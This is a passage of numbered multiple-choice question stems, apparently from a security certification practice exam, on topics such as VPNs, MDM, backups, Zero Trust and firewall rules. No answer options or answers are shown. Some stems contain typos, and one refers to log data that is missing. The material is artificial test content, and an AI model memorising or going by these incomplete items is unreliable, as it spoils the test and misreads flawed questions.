229. Which of the following is most likely associated with introducing vulnerabilities on a corporate network by the deployment of unapproved software?

230. An organization relies on third-party videoconferencing to conduct daily business. Recent security changes now require all remote workers to utilize a VPN to corporate resources.

Which of the following would best maintain high-quality videoconferencing while minimizing latency when connected to the VPN?

231. A security analyst needs to propose a remediation plan for each item in a risk register. The item with the highest priority requires employees to have separate logins for SaaS solutions and different password complexity requirements for each solution.

Which of the following implementation plans will most likely resolve this security issue?

232. A company reduced the area utilized in its datacenter by creating virtual networking through automation and by creating provisioning routes and rules through scripting.

Which of the following does this example describe?

233. Which of the following would produce the closet experience of responding to an actual incident response scenario?

234. A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The Infrastructure needs to handle the unpredictable loads on the company's web application.

Which of the following cloud concepts would BEST these requirements?

235. An analyst is reviewing log data from a SIEM alert about a suspicious event Threat intelligence indicates threats from domains originating in known malicious countries.

The analyst examines the following data.





The Chief information Security Officer asks the analyst determine whether the SIEM alerts can be attributed to the domains m the threat intelligence report.

Which of the following tools would b«ii allow the analyst to make this determination?

236. A company would like to implement a daily backup solution. The backup will be stored on a NAS appliance, and capacity is not a limiting factor.

Which of the following will the company most likely implement to ensure complete restoration?

237. A company is looking to migrate some servers to the cloud to minimize its technology footprint The company has a customer relationship management system on premises.

Which of the following solutions will require the least infrastructure and application support from the company?

238. A Security engineer needs to implement an MDM solution that complies with the corporate mobile device policy.

The policy states that in order for mobile users to access corporate resources on their devices, the following requirements must be met:

✑ Mobile device OSs must be patched up to the latest release.

✑ A screen lock must be enabled (passcode or biometric).

✑ Corporate data must be removed if the device is reported lost or stolen.

Which of the following controls should the security engineer configure? (Select two).

239. An organization wants to secure a LAN/WLAN so users can authenticate and transport data securely. The solution needs to prevent on-path attacks and evil twin attacks.

Which of the following will best meet the organization's need?

240. An analyst is evaluating the implementation of Zero Trust principles within the data plane.

Which of the following would be most relevant for the analyst to evaluate?

241. An administrator is configuring a firewall rule set for a subnet to only access DHCP, web pages, and SFTP, and to specifically block FTP.

Which of the following would BEST accomplish this goal?

242. A security analyst notices several attacks are being blocked by the NIPS but does not see anything on the boundary firewall logs. The attack seems to have been thwarted.

Which of the following resiliency techniques was applied to the network to prevent this attack?

243. A company purchased cyber insurance to address items listed on the risk register.

Which of the following strategies does this represent?

244. A software company has a shared codebase for multiple projects using the following strategy:

• Unused features are deactivated but still present on the code.

• New customer requirements trigger additional development work.

Which of the following will most likely occur when the company uses this strategy?

245. As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a previous incident is happening again.

Which of the following would allow the security analyst to alert the SOC if an event is reoccurring?

246. A security analyst needs to implement security features across smartphones. laptops, and tablets.

Which of the following would be the most effective across heterogeneous platforms?

247. Which of the following provides guidelines for the management and reduction of information security risk?

248. A company wants to reconfigure an existing wireless infrastructure. The company needs to ensure the projected WAP placement will provide proper signal strength to all workstations.

Which of the following should the company use to best fulfill the requirements?

249. Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?

250. A company is required to perform a risk assessment on an annual basis.

Which of the following types of risk assessments does this requirement describe?

251. A security practitioner is performing due diligence on a vendor that is being considered for cloud services.

Which of the following should the practitioner consult for the best insight into the current security posture of the vendor?

252. A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems The company follows a strict process to harden systems immediately upon delivery Even with these strict security measures in place an incident occurred from one of the workstations The root cause appears to be that the SoC was tampered with or replaced.

Which of the following most likely occurred?

253. A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks.

Which of the following can block an attack at Layer 7? (Select TWO).